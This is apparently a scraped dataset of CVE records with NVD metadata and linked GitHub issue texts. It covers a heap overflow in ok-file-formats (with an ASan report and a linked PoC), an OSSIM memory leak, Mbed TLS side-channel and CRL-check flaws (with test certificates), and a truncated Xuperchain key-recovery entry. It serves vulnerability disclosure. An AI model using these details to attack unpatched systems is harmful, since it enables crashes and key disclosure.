[ { "source": "cve@mitre.org", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/122.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/brackeen/ok-file-formats/issues/8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/122.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/brackeen/ok-file-formats/issues/8" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ok-file-formats_project:ok-file-formats:*:*:*:*:*:*:*:*", "matchCriteriaId": "B30BC8B8-FE65-4A39-92D6-AFEDD299D86A", "versionEndExcluding": null, "versionEndIncluding": "2020-06-26", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/brackeen/ok-file-formats/issues/8
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "brackeen", "ok-file-formats" ]
# Describe A heap-buffer-overflow was discovered in ok_file_formats. The issue is being triggered in function ok_jpg_decode_block_progressive() at ok_jpg.c:1054 # Reproduce **test program** ```C #include <stdio.h> #include <stdlib.h> #include "ok_mo.h" #include "ok_jpg.h" int main(int _argc, char **_argv) { FILE *file = fopen(_argv[1], "rb"); ok_jpg image = ok_jpg_read(file, OK_JPG_COLOR_FORMAT_RGBA); fclose(file); if (image.data) { printf("Got image! Size: %li x %li\n", (long)image.width, (long)image.height); free(image.data); } return 0; } ``` Tested in Ubuntu 18.04, 64bit. Compile test program with address sanitizer with this command: ```bash gcc -g -fsanitize=address -fno-omit-frame-pointer -O1 -o Asanjpg main.c ok_jpg.c ok_jpg.h ``` You can get program [here](https://github.com/WayneDevMaze/afl_test_works/blob/master/OKfileformat/Asanjpg/Asanjpg). # ASan Reports ```bash ./Asanjpg crash/jpg-heap-buffer-overflow-2 ``` Get ASan reports ```bash ==78746==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x631000011618 at pc 0x556e3ec8f64c bp 0x7ffca25f9440 sp 0x7ffca25f9430 WRITE of size 2 at 0x631000011618 thread T0 #0 0x556e3ec8f64b in ok_jpg_decode_block_progressive /root/study/ok-file-formats/afl-test/ok_jpg.c:1054 #1 0x556e3ec90c16 in ok_jpg_decode_scan /root/study/ok-file-formats/afl-test/ok_jpg.c:1217 #2 0x556e3ec95c60 in ok_jpg_read_sos /root/study/ok-file-formats/afl-test/ok_jpg.c:1734 #3 0x556e3ec96d3c in ok_jpg_decode2 /root/study/ok-file-formats/afl-test/ok_jpg.c:1900 #4 0x556e3ec97605 in ok_jpg_decode /root/study/ok-file-formats/afl-test/ok_jpg.c:1990 #5 0x556e3ec868a4 in ok_jpg_read_with_allocator /root/study/ok-file-formats/afl-test/ok_jpg.c:268 #6 0x556e3ec8671b in ok_jpg_read /root/study/ok-file-formats/afl-test/ok_jpg.c:257 #7 0x556e3ec85d5e in main /root/study/ok-file-formats/afl-test/main.c:8 #8 0x7ff14d6d7b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #9 0x556e3ec85b29 in _start (/root/study/ok-file-formats/afl-test/Asanjpg/Asanjpg+0x2b29) 0x631000011618 is located 9 bytes to the right of 69135-byte region [0x631000000800,0x63100001160f) allocated by thread T0 here: #0 0x7ff14db85b40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40) #1 0x556e3ec85f00 in ok_stdlib_alloc /root/study/ok-file-formats/afl-test/ok_jpg.c:55 #2 0x556e3ec94b20 in ok_jpg_read_sof /root/study/ok-file-formats/afl-test/ok_jpg.c:1595 #3 0x556e3ec96ac2 in ok_jpg_decode2 /root/study/ok-file-formats/afl-test/ok_jpg.c:1884 #4 0x556e3ec97605 in ok_jpg_decode /root/study/ok-file-formats/afl-test/ok_jpg.c:1990 #5 0x556e3ec868a4 in ok_jpg_read_with_allocator /root/study/ok-file-formats/afl-test/ok_jpg.c:268 #6 0x556e3ec8671b in ok_jpg_read /root/study/ok-file-formats/afl-test/ok_jpg.c:257 #7 0x556e3ec85d5e in main /root/study/ok-file-formats/afl-test/main.c:8 #8 0x7ff14d6d7b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) SUMMARY: AddressSanitizer: heap-buffer-overflow /root/study/ok-file-formats/afl-test/ok_jpg.c:1054 in ok_jpg_decode_block_progressive Shadow bytes around the buggy address: 0x0c627fffa270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c627fffa280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c627fffa290: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c627fffa2a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c627fffa2b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c627fffa2c0: 00 07 fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa 0x0c627fffa2d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c627fffa2e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c627fffa2f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c627fffa300: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c627fffa310: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==78746==ABORTING ``` # Poc Poc file is [here](https://github.com/WayneDevMaze/afl_test_works/blob/master/OKfileformat/Asanjpg/crash/jpg-heap-buffer-overflow-2). # Fuzzer & Testcase Fuzzer is AFL. Testcase is your [testcase](https://github.com/brackeen/ok-file-formats/tree/master/test/jpg) in dir ok-file-formats/test/jpg.
heap-buffer-overflow in function ok_jpg_decode_block_progressive() at ok_jpg.c:1054
https://api.github.com/repos/brackeen/ok-file-formats/issues/8/comments
1
2020-06-26T12:31:02Z
2021-07-19T05:39:01Z
https://github.com/brackeen/ok-file-formats/issues/8
646,230,161
8
2,201
CVE-2020-22650
2021-07-19T17:15:11.083
A memory leak vulnerability in sim-organizer.c of AlienVault Ossim v5 causes a denial of service (DOS) via a system crash triggered by the occurrence of a large number of alarm events.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/jpalanco/alienvault-ossim/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/jpalanco/alienvault-ossim/issues/4" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:att:alienvault_ossim:5.0:*:*:*:*:*:*:*", "matchCriteriaId": "A6A2F558-179E-40B9-87ED-5A76C989D036", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/jpalanco/alienvault-ossim/issues/4
[ "Third Party Advisory" ]
github.com
[ "jpalanco", "alienvault-ossim" ]
I discovered the memory leak vulnerability on 1132th lines in file sim-organizer.c. The memory allocated the function sim_uuid_new() is not freed,before the function sim_event_unref (event) is called. As well as event->backlog_id is the member of the structure event. So when lots of alarm events occurs, increasing memory usage can cause system crash.
A memory leak Vulnerability
https://api.github.com/repos/jpalanco/alienvault-ossim/issues/4/comments
0
2020-03-27T02:27:37Z
2020-03-27T02:27:37Z
https://github.com/jpalanco/alienvault-ossim/issues/4
588,842,727
4
2,202
CVE-2020-36421
2021-07-19T17:15:11.133
An issue was discovered in Arm Mbed TLS before 2.23.0. Because of a side channel in modular exponentiation, an RSA private key used in a secure enclave could be disclosed.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugs.gentoo.org/730752" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbedtls/issues/3394" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbedtls/releases/tag/v2.16.7" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbedtls/releases/tag/v2.23.0" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00036.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugs.gentoo.org/730752" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbedtls/issues/3394" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbedtls/releases/tag/v2.16.7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbedtls/releases/tag/v2.23.0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00036.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:arm:mbed_tls:*:*:*:*:*:*:*:*", "matchCriteriaId": "D46B3697-98E5-4BCB-B135-247667508EAF", "versionEndExcluding": "2.16.7", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:arm:mbed_tls:*:*:*:*:*:*:*:*", "matchCriteriaId": "F7012816-BC1D-4A66-A1E0-E85AB6D3F960", "versionEndExcluding": "2.23.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.17.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "203" ]
203
https://github.com/ARMmbed/mbedtls/issues/3394
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ARMmbed", "mbedtls" ]
### Description - Type: Bug - Priority: Minor --------------------------------------------------------------- ## Bug **mbed TLS build:** Version: 2.16.6 OS version: SGX ---------------------------------------------------------------- *Discoverers:* Ivan Puddu, Moritz Schneider, Miro Haller, Srdjan Capkun, ETH Zurich (i.e., not me) *Short description: The authors describe in their paper a way to determine control flow in SGX enclaves by precisely timing interrupt latency. This succeeds even in balanced branches such as: ``` if (secret == 'a') { var1 = 1 + var1; var2 = 1 + var2; } else { var1 = 2 + var1; var2 = 2 + var2; } ``` The root cause of this is that the front-end of the processor fetches instructions with a 16 byte well-aligned window. The time to resume an instruction will depend on its location within this fetch window (and thus its virtual address) and instructions near it. *Full description:* https://arxiv.org/abs/2005.11516 *Solution:* - Remove the secret dependent branch altogether *Code locations that require fixes: - `mpi_montmul` (bignum.c: 1924): ``` if( mbedtls_mpi_cmp_abs( A, N ) >= 0 ) mpi_sub_hlp( n, N->p, A->p ); else /* prevent timing attacks */ mpi_sub_hlp( n, A->p, T->p ); ```
Leaking control-flow (Frontal attack)
https://api.github.com/repos/Mbed-TLS/mbedtls/issues/3394/comments
3
2020-06-04T10:32:00Z
2020-06-09T11:40:52Z
https://github.com/Mbed-TLS/mbedtls/issues/3394
630,705,609
3,394
2,203
CVE-2020-36425
2021-07-19T17:15:11.327
An issue was discovered in Arm Mbed TLS before 2.24.0. It incorrectly uses a revocationDate check when deciding whether to honor certificate revocation via a CRL. In some situations, an attacker can exploit this by changing the local clock.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugs.gentoo.org/740108" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbedtls/issues/3340" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbedtls/pull/3433" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbedtls/releases/tag/v2.16.8" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbedtls/releases/tag/v2.24.0" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbedtls/releases/tag/v2.7.17" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00036.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugs.gentoo.org/740108" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbedtls/issues/3340" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbedtls/pull/3433" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbedtls/releases/tag/v2.16.8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbedtls/releases/tag/v2.24.0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbedtls/releases/tag/v2.7.17" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00036.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:arm:mbed_tls:*:*:*:*:*:*:*:*", "matchCriteriaId": "7B433A90-3067-4BE3-8ADC-27526D105208", "versionEndExcluding": "2.7.17", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:arm:mbed_tls:*:*:*:*:*:*:*:*", "matchCriteriaId": "5FCB1BC3-0374-4CD1-9DF9-AFB95CD1345A", "versionEndExcluding": "2.16.8", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.8.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:arm:mbed_tls:*:*:*:*:*:*:*:*", "matchCriteriaId": "6180181F-E908-42B7-BBF2-15C437DCC34D", "versionEndExcluding": "2.24.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.17.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "295" ]
295
https://github.com/ARMmbed/mbedtls/issues/3340
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ARMmbed", "mbedtls" ]
### Description - Type: Bug --------------------------------------------------------------- ## Bug **OS** ubuntu 16.04.1 [linux| **mbed TLS build:** Version: 2.16.5 I created a CRL whose revocation date is later than current time. MbedTLS does not use this CRL because it thought that the CRL is illegal (see the code in /library/x509_crt.c, line 1788). Comparatively, openssl does not check the "revocation date" field and revokes certificate(s). The openssl guys explained that "revocation date” is useless in certificate validation and may only be used as meta data (see https://github.com/openssl/openssl/issues/11859). I indeed checked RFC 5280 and did not find any words saying that "revocation date" is important (for certificate parsing and validation). Then do we still need to check the revocation date? ``` #if defined(MBEDTLS_X509_CRL_PARSE_C) /* * Return 1 if the certificate is revoked, or 0 otherwise. */ int mbedtls_x509_crt_is_revoked( const mbedtls_x509_crt *crt, const mbedtls_x509_crl *crl ) { const mbedtls_x509_crl_entry *cur = &crl->entry; while( cur != NULL && cur->serial.len != 0 ) { if( crt->serial.len == cur->serial.len && memcmp( crt->serial.p, cur->serial.p, crt->serial.len ) == 0 ) { if( mbedtls_x509_time_is_past( &cur->revocation_date ) ) return( 1 ); } cur = cur->next; } return( 0 ); } ``` The command I used is: ``` cert_app mode='file' filename=leaf.pem ca_file=root.pem crl_file=test.crl ``` The verification returns ``` Result of MbedTLS: . Loading the CA root certificate ... ok (0 skipped) . Loading the certificate(s) ... ok . Peer certificate information ... cert. version : 3 serial number : 01 issuer name : C=CN, ST=SH, O=SJTU, OU=DDST, CN=NCRL subject name : C=GB, ST=Berkshire, L=Newbury, O=My Company Ltd issued on : 1996-08-01 00:00:00 expires on : 2020-12-31 23:59:59 signed using : RSA with SHA-256 RSA key size : 2048 bits basic constraints : CA=true . Verifying X.509 certificate... Verify requested for (Depth 1): cert. version : 3 serial number : F5:34:01:4D:DA:77:4E:2F issuer name : C=CN, ST=SH, O=SJTU, OU=DDST, CN=NCRL subject name : C=CN, ST=SH, O=SJTU, OU=DDST, CN=NCRL issued on : 2020-03-26 08:27:49 expires on : 2023-01-14 08:27:49 signed using : RSA with SHA-256 RSA key size : 2048 bits basic constraints : CA=true, max_pathlen=3 key usage : Digital Signature, Non Repudiation, Key Encipherment, Key Cert Sign, CRL Sign This certificate has no flags Verify requested for (Depth 0): cert. version : 3 serial number : 01 issuer name : C=CN, ST=SH, O=SJTU, OU=DDST, CN=NCRL subject name : C=GB, ST=Berkshire, L=Newbury, O=My Company Ltd issued on : 1996-08-01 00:00:00 expires on : 2020-12-31 23:59:59 signed using : RSA with SHA-256 RSA key size : 2048 bits basic constraints : CA=true This certificate has no flags ok ``` Result of OpenSSL: ``` C = GB, ST = Berkshire, L = Newbury, O = My Company Ltd error 23 at 0 depth lookup: certificate revoked error leaf.pem: verification failed ``` root.pem ``` -----BEGIN CERTIFICATE----- MIIDNDCCAhygAwIBAgIJAPU0AU3ad04vMA0GCSqGSIb3DQEBCwUAMEcxCzAJBgNV BAYTAkNOMQswCQYDVQQIDAJTSDENMAsGA1UECgwEU0pUVTENMAsGA1UECwwERERT VDENMAsGA1UEAwwETkNSTDAeFw0yMDAzMjYwODI3NDlaFw0yMzAxMTQwODI3NDla MEcxCzAJBgNVBAYTAkNOMQswCQYDVQQIDAJTSDENMAsGA1UECgwEU0pUVTENMAsG A1UECwwERERTVDENMAsGA1UEAwwETkNSTDCCASIwDQYJKoZIhvcNAQEBBQADggEP ADCCAQoCggEBAPNLlu+KPCcjj1KiZ1/sUFvFRDt3Z7WZTWjOYeJUFvycHNcYN9cE laGJ32hfjgaPw9u3cOgs0JJHwIhlQkNhSexUvgGatw336H/3FjPQCJKs48lDJG13 sDF7TK1MvG5wcF1pgRkfvoRSWOyr30aqoeQHaRnqMnT0lWBy26mmV6mgM7LPeNq8 E6jh6aLy7uep3+rO/Ef7LvFi/QWqy+vVVmr5MljXtFyWI+aLs4uFtZZ6rFw5Va4U Y6OffwchjkVex1eML4D593fobkmkubxZEm2o2Upi/Eiech7CM8HuwgqrAwoIVxi6 FlObraD90sUSUKUwohvl03tkjCTXakXF2TUCAwEAAaMjMCEwEgYDVR0TAQH/BAgw BgEB/wIBAzALBgNVHQ8EBAMCAeYwDQYJKoZIhvcNAQELBQADggEBACb6hOtUCqD5 sH4VucCO4FYFHM6nfBvB9vx+c2RPC/psam9clOvL5llrUhY070pXbZnd2hwxfnzj cdr448sVyJkHosukzZj/MyEBV9BERTUMOaY4etQxM2L33uyzn5++/NeRC2Yd53AL vY/s4znat7txqBK/izvLemLerp1Z5E58VFzLOvYNz+7vEoxMmNaU55TGh88VJIvo THaZ3LflTc7hv9eUWin0LTV0mg7cvM+/qWrM2N2hyOukztF5gCcMEgoVkpEgUCJP WsrvOumtDNuXnPr80r4N54n5TaQCTBG22Tj89klc6jUji63+UR9KKACCV44KT8hc +0ecJPmXqEU= -----END CERTIFICATE----- ``` leaf.pem ``` -----BEGIN CERTIFICATE----- MIIDITCCAgmgAwIBAgIBATANBgkqhkiG9w0BAQsFADBHMQswCQYDVQQGEwJDTjEL MAkGA1UECAwCU0gxDTALBgNVBAoMBFNKVFUxDTALBgNVBAsMBEREU1QxDTALBgNV BAMMBE5DUkwwHhcNOTYwODAxMDAwMDAwWhcNMjAxMjMxMjM1OTU5WjBMMQswCQYD VQQGEwJHQjESMBAGA1UECBMJQmVya3NoaXJlMRAwDgYDVQQHEwdOZXdidXJ5MRcw FQYDVQQKEw5NeSBDb21wYW55IEx0ZDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC AQoCggEBAL+N0yePi18I/+MxN/31iBehb2rO5s8MzykUz3aGp3BG/5uEFueqoYZN CNLA38wIUT/ry8wIw+jlTNj29L7Q9uOX8+10XgF4VTVtN14KT0s7tZ5dLjGRD7ft fZF03ifbGYp39fW2Wjutjo4Jyop+Bm7g6SrSJB3uaioITpZh8Xf7MHo+kNjJKPsu ZlVVNQ3T5WQWzoskcpRRIujv7U/NATuRzXODUzqnw+HGavu2qTX3falo5i0dzzrt 9yCtLKqtC+0oX+kZPIi3ib/o20fY3hEXwYstq5sKpvV25xgKTbtwRN1KlMIhfSQN uFXIg/Rd6rbd9P60zPYxzOTwMsaEysECAwEAAaMTMBEwDwYDVR0TAQH/BAUwAwEB /zANBgkqhkiG9w0BAQsFAAOCAQEAKhf5CQGxsJCzkFJv26ggzi2HxN/X/eXcwJyy 3gfPP0JZNLzRb6bmracLui58LyCX+0tmY5TA1G3V94Vdu2LIUMRoANwKszTxhW/n 8oNvXDji+E62EsivCtoPgYRAwFE0q4flvcWzDwGlqCfEdaG1uqYGLlLxW8gmHdFs pKJf4yCzQOn04RmReXOhaAtyUT+xp9AUzawzr2PPGA75x7B07HT4ezLPWy+l1X0o gMBOWm3AwrwTD8k1B488NiKivCYjBn6UPG0r9/gKxSvdEJEJ6SyM8+Jw+f7lij8i 55LYqy8oyPPknQOAWzB+KZkCbqkcBGJLEPR35agBN/SDSdioXA== -----END CERTIFICATE----- ``` test.crl ``` -----BEGIN X509 CRL----- MIIBtjCBnwIBATANBgkqhkiG9w0BAQ4FADBHMQswCQYDVQQGEwJDTjELMAkGA1UE CAwCU0gxDTALBgNVBAoMBFNKVFUxDTALBgNVBAsMBEREU1QxDTALBgNVBAMMBE5D UkwXDTIwMDMwODIwMjYwN1oXDTIxMDIyMTIwMjYwN1owFDASAgEBFw0yMTAyMjEy MDI2MDdaoA4wDDAKBgNVHRQEAwIBADANBgkqhkiG9w0BAQ4FAAOCAQEAkqQPjXyG FTyPmHi47KoMaeg0M7wU5KO8SXOHxUEU65+QuXOK5pOSpjAH+JhLk5H19dY+22gW +Bec3N3PO2Iw7iK58t5jl+UywRl3VNf6g2Pf+7zrZje3XoTHATLp+LHfVkUJLflZ /FiEtJS6NVsNemrAY+BNCCIocHqBVjMAX1zSmUw9lSUFIH6+9HOtVQ0FlmO5RBA5 6QoCmAO3t/5FZF3LqxGj5z3weBVsU340iebf20remV2pEFwWW9KKDBkx+Rd9njgW dmrKXY4pLfAUZ+D2eCevHBU7vLSSjmgBOKu+74/l28wGF+7oFtj5txbK4hdc1j11 /gX0RqNhGLarQw== -----END X509 CRL----- ```
It may not be necessary to check the "revocation date"
https://api.github.com/repos/Mbed-TLS/mbedtls/issues/3340/comments
1
2020-05-21T12:50:03Z
2020-08-26T10:56:11Z
https://github.com/Mbed-TLS/mbedtls/issues/3340
622,477,662
3,340
2,204
CVE-2020-22741
2021-07-19T19:15:07.957
An issue was discovered in Xuperchain 3.6.0 that allows for attackers to recover any arbitrary users' private key after obtaining the partial signature in multisignature.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/xuperchain/xuperchain/issues/782" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/xuperchain/xuperchain/issues/782" } ]
